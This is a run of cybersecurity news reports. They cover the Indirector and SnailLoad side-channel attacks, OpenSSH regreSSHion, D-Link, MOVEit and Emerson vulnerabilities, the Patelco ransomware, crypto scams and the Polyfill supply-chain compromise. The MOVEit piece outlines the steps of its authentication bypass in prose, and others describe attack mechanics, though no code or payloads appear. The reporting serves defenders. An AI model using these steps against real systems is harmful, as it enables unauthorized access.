The Indirector attack developed by University of California San Diego researchers exploits weaknesses in Intel CPUs to launch precise Branch Target Injection (BTI) attacks. Attackers can use a custom tool called the iBranch Locator to locate any indirect branch and then perform precision-targeted IBP and BTB injections to execute speculative code. This allows attackers to steal sensitive information from the processor using a side-channel attack. [caption id="attachment_80025" align="alignnone" width="1208"] Source: indirector.cpusec.org[/caption] This tool enables two high-precision attacks:

• IBP Injection Attack: Locates and injects arbitrary target addresses into victim IBP entries.
• BTB Injection Attack: Injects malicious targets into the victim's BTB entry, misleading it through BTB prediction.

These attacks can potentially bypass existing defenses and compromise system security across various scenarios, including cross-process and cross-privilege situations. The paper has stated that while Intel has already offered several mitigations to protect the BTB and IBP from different types of target injection attacks, such as Indirect Branch Restricted Speculation (IBRS), Single Thread Indirect Branch Predictors (STIBP), and Indirect Branch Predictor Barrier, these defenses were found inadequate and did not always correspond to advertised goals. The researchers stated their surprise on the discovery of potential attack surfaces despite the implementation of these measures. The research paper behind the study has three main important contributions:

• The paper presents the first major analysis of the Indirect Branch Predictor and its interaction with the Branch Target Buffer in the recent Intel processor families. The paper details the size, structure, and precise indexing and tagging hash functions.
•  The paper analyzes mitigation mechanisms (IBRS, STIBP, and IBPB) on Intel CPUs designed to protect against BTB and IBP target injection attacks.
• The paper demonstrated the use of the iBranch Locator as an efficient  tool with the capability of locating any indirect branches within the IBP without requiring prior data on the the branch. The paper highlights that by using this tool, attackers can successfully break address space layout randomization.

Intel Indirector Mitigations

For Intel processors, researchers recommend more aggressive use of the Indirect Branch Predictor Barrier (IBPB) and suggest the incorporation of more fine-grained BPU isolation across security domains in future CPU designs. Possible further mitigations include a more aggressive use of the Indirect Branch Predictor Barrier (IBPB) and hardening the Branch Prediction Unit (BPU) design through the incorporation of more complex tags, encryption, and randomization. The researchers disclosed their findings to Intel in February 2024, with the researchers stating that Intel had informed other affected hardware and software vendors about the vulnerability. The researchers' discoveries underscore the importance of ongoing scrutiny and analysis of hardware components and the need for chip manufacturers to continually improve their designs to stay ahead of potential threats. The authors thanked anonymous reviewers for helpful suggestions on the research paper.

Patelco Credit Union, one of the oldest and largest credit unions in the U.S., fell victim to a ransomware attack on June 29, 2024, forcing the institution to shut down most of its day-to-day banking systems. The attack has affected nearly half a million members across the Bay Area and Northern California, leaving them without access to crucial financial services. The Dublin, Ohio-based credit union disclosed details of the security incident through social media and email communications from President and CEO Erin Mendez. While initial details were scarce, Patelco later confirmed the nature of the attack and its widespread impact on member services.

Scope Of Patelco Credit Union Attack

The ransomware attack has crippled Patelco's online banking platform, mobile app, and call center operations after staff shut down these systems to contain the attack. Members are currently unable to perform electronic transactions such as transfers (including Zelle), direct deposits, balance inquiries, and online bill payments. [caption id="attachment_79973" align="alignnone" width="1184"] Source: X.com (@PatelcoPays)[/caption] Debit and credit card transactions are functioning in a limited capacity, while ATM cash withdrawals and deposits remain available at Patelco and shared branch ATMs. The credit union's President and CEO, Erin Mendez, issued a statement on social media Saturday morning, announcing that services were unavailable due to a "serious security incident." An email was sent to members later that day, revealing that the incident was a ransomware attack, confirming that the credit union had shut down its systems to contain and remediate the issue.

Patelco Credit Union Response and Recovery Efforts

In the email shared to Patelco members, Mendez apologized for the inconvenience and assured members that the credit union was working around the clock with third-party cybersecurity professionals to assess the situation and restore services. The credit union has warned members to expect longer than normal wait times at branches and through customer service channels. While the full extent of the attack's impact remains unclear, Patelco has assured members that they can still access cash from ATMs. The credit union has also set up a dedicated webpage for ongoing communications about the incident and system functionality updates. The latest update on the security incident from the dedicated webpage states:

Please know that our team and third-party partners are working around the clock to get back up and running. We are committed to providing transparent and frequent updates to best of our ability as well as the best possible service that we can, given the disruption. We sincerely apologize for the inconvenience that this cyber attack has caused for our members. We anticipate longer than normal wait times and truly appreciate your patience and support during this difficult time.

The website also provides details on the availability of locations, categorizing them as available, limited functionality, and unavailable. [caption id="attachment_79968" align="alignnone" width="2208"] Availability of Patelco Credit Union Locations (Source: www.patelco.org/securityupdate)[/caption] The site disclosed  that there was no evidence that account information such as account number/member number, or online banking credentials such as mobile and online banking User IDs or passwords, were affected.

D-Link DIR-859 WiFi routers have been found to have a path traversal vulnerability that allows for information disclosure. This vulnerability, identified as CVE-2024-0769, affects all hardware revisions and firmware versions of the DIR-859. The DIR-859 model has reached its end-of-life status and will not be receiving any further updates from D-Link.

D-Link DIR-859 Router Vulnerability

The vulnerability allows attackers to access and retrieve sensitive information from the router's configuration files. The vulnerability occurs in the /htdocs/cgibin directory on the DIR-859 router, where HTTP requests are processed by a single binary. By sending a specially crafted HTTP POST request to the router's web interface, an attacker can bypass security measures and gain unauthorized access to user data. Researchers from security firm GreyNoise observed a variation of the exploit in the wild, which targets a specific configuration file containing user account information. The discovered exploit scripts leverage the vulnerability to retrieve the DEVICE.ACCOUNT.xml file, which contains usernames, passwords, group information, and descriptions for all users of the device.

Protection Against D-Link Vulnerability

D-Link strongly recommends that users of DIR-859 routers retire and replace their devices with newer, supported models. The company advises against continued use of end-of-life products due to the potential security risks involved. The discovery of this vulnerability has significant implications for owners of D-Link DIR-859 routers:

• Permanent vulnerability: As the router model is no longer supported, there will be no official patch to address this security flaw.
• Long-term risk: The disclosed information remains valuable to attackers for the entire lifespan of the device, as long as it remains internet-facing.
• Potential for further exploitation: The vulnerability could be used in combination with other, yet unknown, vulnerabilities to gain full control over the affected devices.

For U.S. customers unable to immediately replace their routers, it's crucial to take additional security measures, such as disabling remote management features, usage of strong and unique passwords for all accounts, regularly monitoring router logs for suspicious activity, and considering using a separate  virtual private network (VPN) for added security. D-Link's official security advisory stated:

D-Link strongly recommends that this product be retired and cautions that any further use of this product may be a risk to devices connected to it. If US consumers continue to use these devices against D-Link's recommendation, please make sure the device has the most recent firmware, make sure you frequently update the device's unique password to access its web-configuration, and always have WIFI encryption enabled with a unique password.

Researchers stated that while the intended usage of disclosed information from the routers is unknown, they remain valuable for the attackers for the lifetime of the device as long as they remain connected to the internet.

Researchers have identified a significant remote code execution (RCE) vulnerability that could affect millions of OpenSSH servers. The vulnerability - dubbed 'regreSSHion' and recorded as CVE-2024-6387 - allows for unauthenticated root-level remote code execution, posing a serious security risk. The vulnerability affects OpenSSH server software running on Linux systems that use the GNU C Library. It stems from a race condition in how OpenSSH handles certain signals during connection attempts.

regreSSHion Vulnerability and Its Impact

Researchers from Qualys discovered that the vulnerability stems from a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability is remotely exploitable, making it a significant threat to Linux systems. The potential impact of this vulnerability is severe, as it could lead to a complete system takeover, installation of malware, data manipulation, and the creation of backdoors for persistent access. An attacker with root access could bypass critical security mechanisms such as firewalls, intrusion detection systems, and logging mechanisms, making it even more challenging to detect and respond to an attack. The regreSSHion vulnerability impacts a broad range of OpenSSH versions, from the earliest releases up to, but not including, version 9.8p1. However, its effects vary depending upon the version:

• Versions before 4.4p1 are vulnerable unless patched for earlier, related flaws.
• Versions 4.4p1 to 8.5p1 are not affected due to previous security fixes.
• Versions 8.5p1 to 9.8p1 are vulnerable due to an accidental removal of critical code.

However, servers on OpenBSD systems remain unaffected thanks to a secure mechanism implemented in 2001. The researchers stated that they had developed a working exploit for the vulnerability and had disclosed it to the  OpenSSH team to assist in remediation efforts. While the researchers do not release exploits as part of firm policy, they believe that other researchers would be able to replicate results.

Mitigating Risk to OpenSSH Servers

The vulnerability's discovery highlights the importance of ongoing security audits and regression testing in software development. The flaw is a reintroduction of a bug first patched in 2006, demonstrating how even well-maintained projects can inadvertently reopen old security holes. Organizations running vulnerable OpenSSH versions should take immediate action:

• Apply patches: Update to OpenSSH 9.8p1 or apply vendor-provided fixes for older versions.
• Limit access: Restrict SSH connections through network controls to reduce attack surface.
• Segment networks: Isolate critical systems to prevent lateral movement if a breach occurs.
• Monitor activity: Deploy intrusion detection systems to alert on potential exploitation attempts.
• Assess exposure: Use asset management tools to identify vulnerable systems across the enterprise

For systems that can't be immediately patched, the researchers recommend setting the LoginGraceTime parameter to 0 in the SSH configuration file as a way to mitigate against remote-code execution. However, the researchers warn that this could instead leave the server vulnerable to denial-of-service attacks.

An executive from National Australia Bank says the country's four major banks are under constant attack, with threat actors launching a barrage of attacks every minute of every day. According to Chris Sheehan, National Australia Bank's executive for group investigations, "every bank is being attacked all the time." The aim of these attacks is to steal sensitive information and money from unsuspecting customers. The four major banks in Australia include ANZ Bank, Commonwealth Bank, National Australia Bank (NAB), and Westpac. These banks are officially recognized to be the largest within the country and are prohibited from mergers or acquisitions between each other as part of the "Four pillars policy." This relentless barrage of cyber assaults targets not only the banks' systems but also their customers, leaving millions potentially vulnerable to sophisticated scams and financial theft. Threat actors may employ various forms of attacks, including the distribution of malicious code, security breaches, and denial of service campaigns, making it a daunting task for banks to stay ahead.

National Australia Bank Executive Raises Alarm

The cyber attacks on Australian banks are not isolated incidents but a  stream of continuous attempts to breach security, deny services, and steal sensitive information. Sheehan describes the situation as "asymmetrical warfare," with threats ranging from amateur hackers to highly organized transnational crime groups and even malicious nation-state actors. Sheehan stated:

From, being colloquial, Larry the loser, in the basement at home that's having a bit of a chop away at the laptop and trying to steal money from people or hack into a system, all the way to highly sophisticated, ruthless and resilient transnational organised crime groups and they're the ones that are driving 90 per cent of the scams that are hitting Australian victims.

Criminals perceive online attacks as lower risk compared to traditional bank robberies, with the potential for much higher rewards. The extent of the problem is staggering, with Australians losing an estimated $3 billion annually to cyber scams. The official's statements come shortly after customers observed the bank's own website being down for several hours. NAB's website temporarily informed visitors that its services were not working and directed them to use the NAB app or telephone banking instead. [caption id="attachment_79748" align="alignnone" width="1182"] Source: X.com(@Tzarimas)[/caption] While the bank's services appear to have been restored, it is unknown if the downtime was the result of an attack or routine maintenance. Several customers expressed frustration over not being alerted of the downtime via email or text and concerns over pending transactions. [caption id="attachment_79752" align="alignnone" width="1174"] Source: X.com(@NAB)[/caption]

Defending Australian Banks

In response to this relentless assault, Australian banks have ramped up their defenses. The banks are working hard to stay ahead of the scammers, with NAB employing a dedicated call center and operations team to fight fraud and scams. The team consists of 350-400 people working around the clock and is available 24/7. Banks have also implemented new policies, such as eliminating hyperlinks in official communications with customers, to help distinguish legitimate messages from scams. Despite these efforts, the battle against cyber crime remains an uphill struggle. Once a customer falls victim to a scam and initiates a payment, recovery of funds is often impossible. Chris Sheehan advises, "if it looks or sounds too good to be true, or if someone's applying pressure to you that you're going to miss out on something, or you're going to suffer a penalty, if you don't make that payment, they are massive red flags." The Australian Banking Association acknowledges the severity of the situation, describing it as a "scams war." The banks are also implementing extra safeguards to prevent money from being lost to international criminal gangs. Amidst this persistent threat, it is crucial for customers of the major banks to remain vigilant against the tactics used by these scammers.

Researchers from Austria's Graz University of Technology have uncovered a novel side-channel attack called SnailLoad that exploits network latency to infer user activity. SnailLoad is a non-invasive attack technique that could allow attackers to gather information about websites visited or videos watched by victims without needing direct access to their network traffic.

How The SnailLoad Exploit Works

SnailLoad takes advantage of the bandwidth bottleneck present in most internet connections. When a user's device communicates with a server, the last mile of the connection is typically slower than the server's connection. An attacker can measure delays in their own packets sent to the victim to deduce when the victim's connection is busy. [caption id="attachment_79548" align="alignnone" width="1287"] Source: snailload.com[/caption] The attack masquerades as a download of a file or any website component (like a style sheet, a font, an image or an advertisement). The attacking server sends out the file at a snail's pace, to monitor the connection latency over an extended period of time. The researchers decided to name the technique 'SnailLoad' as "apart from being slow, SnailLoad, just like a snail, leaves traces and is a little bit creepy." The attack requires no JavaScript or code execution on the victim's system. It simply involves the victim loading content from an attacker-controlled server that sends data at an extremely slow rate. By monitoring latency over time, the attacker can correlate patterns with specific online activities. The researchers have shared the conditions required to recreate the SnailLoad attack:

• Victim communicates with the attack server.
• Communicated server has a faster Internet connection than the victim's last mile connection.
• Attacker's packets sent to victim are delayed if the last mile is busy.
• Attacker infers website visited or video watched by victim through side-channel attack.

In the related user study detailed in the SnailLoad research paper, the researchers approached local undergraduate and graduate students who volunteered to run a measurement script that employs the SnailLoad attack technique. The researchers took steps to ensure that no personal information had been exposed to information leakage at any point. Furthermore, the researchers had planned to destroy collected traces after the paper had been published and offer students the option to directly request the deletion of traces or exclusion of their traces in the paper's results at any point. The researchers reported the attack technique to Google on March 9 under the responsible disclosure section of their paper, with Google acknowledging the severity of the issue. The tech giant also stated that it was investigating possible server-side mitigations for YouTube.  The researchers shared working proof of concept on GitHub along with instructions and an online demo.

SnailLoad Implications and Mitigation

In testing, SnailLoad was able to achieve up to 98% accuracy in identifying YouTube videos watched by victims. It also showed 62.8% accuracy in fingerprinting websites from the top 100 most visited list. While not currently observed in the wild, SnailLoad could potentially affect most internet connections. Mitigation is challenging, as the root cause stems from fundamental bandwidth differences in network infrastructure. The researchers stated that while adding random noise to the network can reduce the accuracy of the attack, it could impact performance and cause inconvenience to users. As online privacy concerns grow, SnailLoad highlights how even encrypted traffic could potentially be exploited to leak information through subtle timing differences. Further research could be required to develop effective countermeasures against this new class of remote side-channel attacks.

Security experts have identified multiple vulnerabilities in widely used industrial gas chromatographs manufactured by Emerson Rosemount. These flaws could potentially allow malicious actors to access sensitive information, disrupt operations and execute unauthorized commands. Gas chromatographs are critical instruments used for analyzing chemical compounds across a range of industries, including environmental facilities, hospitals, and food processing companies. These devices are critical for ensuring the accuracy of gas measurements and the safety of the environment, patients, and consumers.

Flaws in Emerson Rosemount Gas Chromatographs

Operational technology security firm Claroty discovered the vulnerabilities, which include two command injection flaws and two authentication bypass issues. If exploited, these flaws could enable unauthenticated attackers to run arbitrary commands, access sensitive data and gain administrative control. [caption id="attachment_79530" align="alignnone" width="649"] Source: Wikipedia[/caption] [caption id="attachment_79525" align="alignnone" width="1476"] Emulated system (Source: claroty.com)[/caption] To study the Emerson Rosemount 370XA gas chromatograph, commonly used in industrial settings for gas analysis, the researchers took efforts to emulate the systems. This complex process was undertaken because the physical device could cost over $100,000 while the research was limited to a six-week project. The emulation process involved download and extraction of the device firmware from the official Emerson Rosemount website, and a search for an application that could implements its proprietary protocols. The researchers used the QEMU emulator to emulate the PowerPC architecture used by the gas chromatograph and run the extracted firmware. Upon investigation, the researchers were able to uncover four key vulnerabilities:

• CVE-2023-46687: Allows remote execution of root-level commands without authentication (CVSS score: 9.8)
• CVE-2023-49716: Enables authenticated users to run arbitrary commands remotely (CVSS score: 6.9)
• CVE-2023-51761: Permits unauthenticated users to bypass authentication and gain admin access by resetting passwords (CVSS score: 8.3)
• CVE-2023-43609: Allows unauthenticated users to access sensitive information or cause denial-of-service (CVSS score: 6.9)

The U.S. Cybersecurity and Infrastructure Security Agency issued an advisory in January warning that successful attacks could lead to "denial-of-service conditions" and unauthorized system access. The affected models include GC370XA, GC700XA and GC1500XA running firmware versions 4.1.5 and earlier.

Industry Impact and Mitigation

Gas chromatographs play a crucial role in various sectors, from environmental monitoring to medical diagnostics. Compromised devices could have far-reaching consequences. In food processing, attacks on chromatographs might prevent accurate bacteria detection, halting production. In healthcare settings, disrupted blood sample analysis could impact patient care. Emerson has released updated firmware addressing these vulnerabilities. The Claroty researchers said they "appreciate Emerson for its swift response and cooperation, which demonstrates their dedication to our shared goal." Emerson advises customers to apply the patches and implement best practices in the cybersecurity industry according to current standards. The firm stated, "In addition, Emerson recommends end users continue to utilize current cybersecurity industry best practices and in the event such infrastructure is not implemented within an end user’s network, action should be taken to ensure the Affected Product is connected to a well-protected network and not connected to the Internet. In its advisory CISA shared the following recommendations for securing these systems:

• Minimize network exposure: Ensure that control system devices and/or systems,  are not publicly accessible from the internet.
• Locate control system networks:  Place remote devices behind firewalls and isolate them from business networks
• Secure Remote Access: Use Virtual Private Networks (VPNs) to secure remote access. However, the agency also warned of potential inherent risks in VPNs, asking organizations and businesses to be aware of them.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures," the advisory stated.

A convincing live stream featuring a seemingly-legitimate Donald Trump YouTube channel quickly gained massive traction before the U.S. Presidential debate Thursday, reaching nearly half the number of subscribers as the official Donald Trump YouTube channel before it was taken down. The channel and Trump deepfake urged viewers to donate in cryptocurrency, with promises of substantial rewards in exchange. The video was titled with keywords related to the official Presidential debate between Trump and Biden while sharing a fake promotional website and QR code for donations through Bitcoin, Ethereum, Doge and Tether cryptocurrencies.

Fake Trump Cryptocurrency Promotion Scam Streamed Ahead of Presidential Debate

The timing of the fake live stream coincided with the scheduled debate this week between current U.S. President Joe Biden and former President and challenger Donald J. Trump. Scammers behind the campaign appeared to be taking advantage of actual statements made by Trump supporting cryptocurrency in the past, coupled with a repeated AI-generated video where he sits alongside popular YouTuber Logan Paul to speak about promoting cryptocurrency within the United States if elected. [caption id="attachment_79454" align="alignnone" width="1351"] Screenshot taken from the livestream.[/caption] The fake video appears to stem from an edit of a podcast video where Trump joined the YouTuber to speak on various issues, including the election, U.S. politics, his personal life and his opponent. The edited fake video shared a QR code and website (donaldtrump[.]gives) where viewers could be tricked into making donations. The website incorporates official Trump campaign branding for the 2024 presidential election, sharing instructions for participation in the "unique event," a multiplier to lure visitors with calculations on how much cryptocurrency they would receive in return for their donation, and a "live" feed of ongoing donations made to the shared cryptocurrency addresses. [caption id="attachment_79477" align="alignnone" width="690"] Cryptocurrency addresses involved with the scam[/caption] "During this unique event, you have the opportunity to take a share of 2,000 BTC & 50,000 ETH & 500,000,000 DOGE & 50,000,000 USDT. Have a look at the rules and don't miss out on this. You can only participate once!" the scam website stated. According to details from a WhoIs lookup, the website appears to have been registered on June 27th, the same day as the Presidential debate, using a Russian registrant.

YouTube Channel Connected To Scam Taken Down

The YouTube channel behind this promotion was taken down shortly after a report to YouTube, but the website promoted during the stream still appears to be up and running. The channel was noted to have about 1.38 million subscribers before its takedown, nearly half the subscriber count (2.9 million) for the official Donald J Trump YouTube channel. [caption id="attachment_79462" align="alignnone" width="606"] Email confirmation of Channel takedown[/caption] It is unknown if the live transaction feed featured on the scam website reflects actual real-time transactions. The full extent and the victim count from this cryptocurrency scam is unknown; details of the campaign have been sent to CRIL (Cyble Research and Intelligence Labs) researchers for further investigation. [caption id="attachment_79474" align="alignnone" width="2604"] Screenshot of alleged transactions[/caption] The campaign highlights the threat of Artificial Intelligence content to election-related processes, legitimate campaign donations and impersonation of candidates or well-known figures. In a recent incident, crypto scammers had taken over the YouTube channel of Channel 7 News Australia to use a deepfake Elon Musk to promote dubious crypto investments.

💾

A data security officer from the Manila Bulletin has admitted to hacking 93 websites, including government and private company sites, as well as servers abroad. The hacker, known by the alias "Kangkong," was arrested along with two others by the National Bureau of Investigation (NBI) Cybercrime Division on June 19 following reports of multiple unauthorized access attempts and breaches. Kangkong issued a public apology to President Marcos, the general public, and especially the military community for his actions.

Implications for Philippines National Security

Kangkong's hacking spree exposed significant vulnerabilities in the cybersecurity measures of various organizations. Among the high-profile targets were the peacekeeping operations center website of the Armed Forces of the Philippines, the mail server of the National Security Council, and the Join the PH Army website. The hacker along with two others individuals were arrested by the National Bureau of Investigation (NBI) Cybercrime Division on June 19 after reports of multiple unauthorized access attempts and breaches on websites. [caption id="attachment_79338" align="alignnone" width="1200"] Arrested data officer Kangkong (Source: www.onenews.ph)[/caption] The hacker acknowledged the serious consequences of his actions, including the potential exposure of sensitive data of soldiers to foreign entities. "That's when I realized that we have many enemies and we should not be going against each other," Kangkong stated. The officer revealed in an interview with ABS-CBN that he had left specific pictures on compromised websites as proof of his involvement.

Senior Technology Officer May Be Implicated

In his extrajudicial confession, Kangkong initially implicated Art Samaniego, Manila Bulletin's senior technology officer, as the person who ordered the hacking of several websites. However, he later expressed regret for this claim. Samaniego has denied allegations that he ordered the hacking to boost his social media reach. The NBI Cybercrime Division has issued a subpoena for Samaniego to explain his side to the authorities. Meanwhile, the Manila Bulletin has suspended Samaniego pending an internal investigation. Kangkong also highlighted the inadequate cybersecurity measures in place for government and private companies' websites, stating that this was a key factor in his ability to hack them. He urged organizations to invest in security measures to prevent similar breaches in the future. Kangkong's confession highlights the urgent need for improved cybersecurity measures in the Philippines. He emphasized that inadequate security was a key factor in his ability to breach these websites. "Cybersecurity is not really a priority in the Philippines," he stated, urging organizations to invest in better security measures despite the associated costs.

A newly disclosed vulnerability in Progress MOVEit Transfer has sparked concern among cybersecurity experts due to the lingering memory of high-profile attacks by ransomware gangs using a different vulnerability last year that hit organizations such as the BBC and FBI. The new authentication bypass flaw, officially designated CVE-2024-5806, could potentially allow unauthorized access to sensitive data. MOVEit Transfer, designed for large-scale enterprise use, boasts features compliant with regulations like PCI and HIPAA. It offers various file transfer methods, including SFTP and HTTPS, making it a critical component in many organizations' data management infrastructure. Progress initially kept details of CVE-2024-5806 under wraps, advising customers to patch systems before its disclosure. On June 25th, 2024, Progress officially un-embargoed the vulnerability, revealing that it affects both MOVEit Transfer version 2023.0 and newer, as well as MOVEit Gateway version 2024.0 and newer.

Progress MOVEit Vulnerability Details

WatchTowr Labs was sent details of the vulnerability by a user who identified as 'dav1d_bl41ne' on its IRC channel, an unusual method of vulnerability sharing, the researchers noted. The researchers decided to investigate further, setting up a test environment to replicate the vulnerability. [caption id="attachment_79318" align="alignnone" width="471"] Source: labs.watchtowr.com[/caption] The debugger output from the test environment showed that the server was throwing exceptions and attempting to access files in unexpected ways. Upon further investigation, the researchers discovered that the vulnerability could be exploited by providing a valid file path instead of the SSH public key during authentication. This led to the server attempting to access the file, giving the attacker unauthorized access to the system. The researchers shared the following steps on exploiting the vulnerability:

• Upload a public key to the File Transfer server.
• Rather than supplying a legitimate public key, send a file path to the public key, signing the authentication request with the same public key.
• The key will be accepted by the server with successful login, allowing for the access of target files.

The flaw affects MOVEit Transfer versions 2023.0 and newer, as well as MOVEit Gateway 2024.0 and later. Progress describes it as an "Improper Authentication vulnerability" in the SFTP module that could lead to "Authentication Bypass in limited scenarios." In limited scenarios, CVE-2024-5806 allows for authentication bypass, potentially giving attackers unauthorized access to sensitive files. The vulnerability is particularly concerning because the software is widely used among enterprises, making it a prime target for APT groups, ransomware gangs, and other malicious actors. Progress has shared the following recommendations to prevent exploitation of the flaw:

• Block public inbound RDP access to MOVEit Transfer server(s).
• Limit outbound access on MOVEit Transfer server(s) to only trusted endpoints.

According to a post on X from The Shadowserver Foundation, the foundation has already observed active exploitation attempts using the vulnerability soon after its disclosure. [caption id="attachment_79326" align="alignnone" width="1170"] Source: X.com[/caption]

Implications of the MOVEit Vulnerability

The discovery of this vulnerability soon after major exploitation last year has reignited discussions about the security of file transfer solutions in enterprise environments. The potential for unauthorized access to sensitive files could have far-reaching consequences for the large number of enterprises that rely on MOVEit Transfer. While the full extent of the vulnerability's impact is still being assessed, the incident has sparked more debate about responsible disclosure practices in the cybersecurity community. Some argue that early, private notifications to affected parties are crucial, while others advocate for more transparent, public disclosures to ensure widespread awareness and prompt action. As the situation develops, IT administrators and security professionals are advised to stay vigilant, monitor for any signs of exploitation, and implement recommended security measures to protect their MOVEit Transfer deployments.  

Scammers are exploiting the buzz around the 2024 Paris Olympics to lure victims into investing in initial coin offerings (ICOs). These scams tend to promise big returns on "Olympic" tokens. The campaigns manufacture hype around such offerings through the use of use fake websites, AI-generated images, and social media campaigns to entice investors.

 Olympics Initial Coin Offerings (ICO) Fraud

Researchers from Trend Micro uncovered a recent scheme that claimed to offer an official "Olympics Games Token" for sale. The Olympic Games Token ICO website, theolympictoken[.]com, was registered on March 30, 2024, and its website went live a day later.  The website also links to a legitimate Olympics 2024 logo and a countdown to the event, making it seem like a legitimate project. [caption id="attachment_79264" align="alignnone" width="395"] Source: trendmicro.com[/caption] It linked to a "whitepaper" – a document explaining the project's tech and goals. But that link led nowhere useful. Instead of details, it dumped visitors on the official Olympics website. Red flag number one. A Twitter account and Telegram channel pushed followers to buy tokens ASAP. When the original site got shut down, a near-identical one (olympictokensolana[.]com) popped up under a new name. The researchers spotted at least ten other websites using 2024 Olympics-associated branding to lure victims into ICO scams; some of them were shut down shortly after their discovery.

Use of AI-Generated Images Olympics in ICO Scams

[caption id="attachment_79257" align="alignnone" width="1263"] Source: trendmicro.com[/caption] The researchers remarked that AI-generated images are becoming increasingly common in such ICO scams, as they offer a cost-effective and time-efficient way to create convincing lures. Cybercriminals can use AI to generate text, correct spelling and grammatical errors, and even create sentences in languages they do not speak. [caption id="attachment_79256" align="alignnone" width="384"] Source: trendmicro.com[/caption] The researchers spotted at least three other ICO Olympics scam websites employing the usage of AI-generated imagery for promotion.

Spotting Fake ICO Campaigns

ICOs have gained significant attention as cryptocurrency continues to be adopted in various industries. While most new tokens lack utility and are simply memecoins, it does not always mean they are scams. Investors should be vigilant and look out for potential scams and rug-pulls. A legitimate ICO should have a proper website and social media presence, a transparent team, an active community, a comprehensive whitepaper, legitimacy of claims, token distribution, smart contract audit, and liquidity management. The researchers have shared the following guidelines to help identify such scams:

• Proper website and social media presence: The researchers stated that scam sites are often poorly designed or lack active presence on social media.
• Transparent team: Cross-check the identities and credentials of the teams behind the offering. Anonymity is a red flag.
• Active community: Genuine projects have engaged followers on platforms like Discord, Twitter or Telegram, which suggests genuine interest and support.
• Comprehensive whitepaper: A whitepaper that outlines the project's goals, utility, and technical aspects, which demonstrates a thorough understanding of the project's concept and planning.
• Legitimacy of claims: Claims backed by verifiable evidence, such as partnerships, use cases, and endorsements.
• Token distribution: Avoid projects with highly concentrated token ownership which might increase the chances of exit scams.
• Smart contract audit: Audit by reputable third-parties, which identify vulnerabilities.
• Liquidity management: Liquidity is locked to prevent premature withdrawals and is decentralized among the community, which secures investors' funds.

In the case of the Olympic Games Token, the website raised several red flags such as a very low number of token holders and an invalid whitepaper link. Investors and those interested in cryptocurrency should follow adequate precautions to avoid falling victim to such scams. Experts have been monitoring Olympics-related search engine results and social media activity to counter fraudulent ticketing scams and coordinated disinformation campaigns.

South Korean telecommunications giant KT is under investigation for allegedly hacking the systems of customers who used torrent services such as web hard drives (Webhard), a popular file-sharing service in the country. The scandal, which has been ongoing for nearly five months, has affected an estimated 600,000 customers, with the police investigation revealing that KT may have operated a dedicated malware team.

Malware Infiltrated Systems of Torrenting Subscribers

The incident came to light in May 2020 when numerous web hard drives suddenly stopped working. Users flooded company forums with complaints about unexplained errors. An investigation revealed that malware had infiltrated the "Grid Program," software that enables direct data exchange between users. [caption id="attachment_79121" align="alignnone" width="2800"] Source: mnews.jtbc.co.kr[/caption] The malware, which was designed to interfere with BitTorrent traffic, was allegedly used to monitor and control the internet activities of KT subscribers. The police believe that the motive behind this hacking was to reduce network-related costs, as torrent transfers can be costly for internet service providers. KT, however, claims that it was merely trying to manage traffic on its network to ensure a smooth user experience. KT instead stated that the Webhard services were malicious, however after the the Gyeonggi Southern District Office conducted raids on KT facilities, they believe the ISP may have violated communications and network laws. A police follow-up investigation stated that KT operated a dedicated team responsible for developing, distributing, and operating the malware program. The hacking was traced to  KT's Bundang IDC Center, one of its data centers. Over five months, an estimated 20,000 PCs were infected daily. The malware reportedly created strange folders, made files invisible, and disabled web hard programs.

Legal and Ethical Implications

KT and Webhard companies have a history of conflict, including lawsuits. While a previous court ruled in KT's favor regarding traffic blocking of grid services, the current situation differs significantly. KT was alleged to have planted malicious code on individual users' PCs without consent or explanation. South Korean legal experts question KT's methods, suggesting the company could have pursued formal procedures through its legal team instead of resorting to hacking. The incident raises serious concerns about privacy, corporate responsibility, and the extent to which internet service providers can control network traffic. The scandal has also raised concerns about the security of KT's customers' data, with many wondering what other sensitive information may have been compromised. The company's CEO has since resigned, and the company's reputation has taken a significant hit. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A widespread supply chain attack has hit more than 100,000 websites, including notable platforms like JSTOR, Intuit, and the World Economic Forum. The attack stems from a fake domain impersonating the popular open-source library Polyfill.js, which supports older browsers. In February, the Chinese company Funnull had acquired the domain and GitHub account associated with the project, leading to the injection of malware into sites that embed cdn.polyfill.io. The malicious code is designed to redirect mobile users to sports betting sites or pornographic sites using a fake Google Analytics domain.

Malicious Polyfill Injection and Its Impact

Researchers stated that the injected malware is dynamically generated based on HTTP headers, making it difficult to detect. The Polyfill injection attack is a classic example of a supply chain attack against a widely used library. [caption id="attachment_79097" align="alignnone" width="2454"] At least 104183 websites might be affected. (Source: publicwww.com)[/caption] The compromised Polyfill code dynamically generates malware based on HTTP headers, potentially utilizing multiple attack vectors. Researchers from Sansec decoded one variant that redirects mobile users to a sports betting site using a fake Google Analytics domain. The malware employs sophisticated techniques and defenses against reverse engineering to evade detection, including:

•  Activating only on specific mobile devices at certain hours
•  Avoiding execution when an admin user is detected
•  Delaying activation when web analytics services are present

The attack's scope is significant, with Google already blocking Google Ads for e-commerce sites using polyfill.io. Researchers later reported that their infrastructure had been subjected to DDoS attacks after reporting on the campaign.

Mitigation and Recommendations

Andrew Betts, the original Polyfill author, took to X to advise against the usage of Polyfill altogether, stating that modern browsers no longer require it. He added that he had no influence over the sale of the project and was never in possession of the new domain, and cautioned that websites that serve third-party scripts are a huge security concern. [caption id="attachment_79101" align="alignnone" width="623"] Source: X.com(@triblondon)[/caption] [caption id="attachment_79102" align="alignnone" width="634"] Source: X.com(@triblondon)[/caption] Experts have set up a domain (polykill.io) to warn against the compromise of the project and have recommend the following steps for website owners:

• Immediately and remove usage of cdn.polyfill.io from websites and projects.
• Replace with a secure alternative such as those being offered by Fastly and CloudFlare. Fastly has saved and hosted an earlier version(https://polyfill-fastly.io/) of the project's codebase before its sale to Funnull.

The website cautioned of the risks associated with the takeover of the project:

"There are many risks associated with allowing an unknown foreign entity to manage and serve JavaScript within your web application. They can quietly observe user traffic, and if malicious intent were taken, they can potentially steal usernames, passwords and credit card information directly as users enter the information in the web browser."

CloudFlare had also published its findings and recommendations in response to concerns over the compromise of domains. The company stated in a blog article:

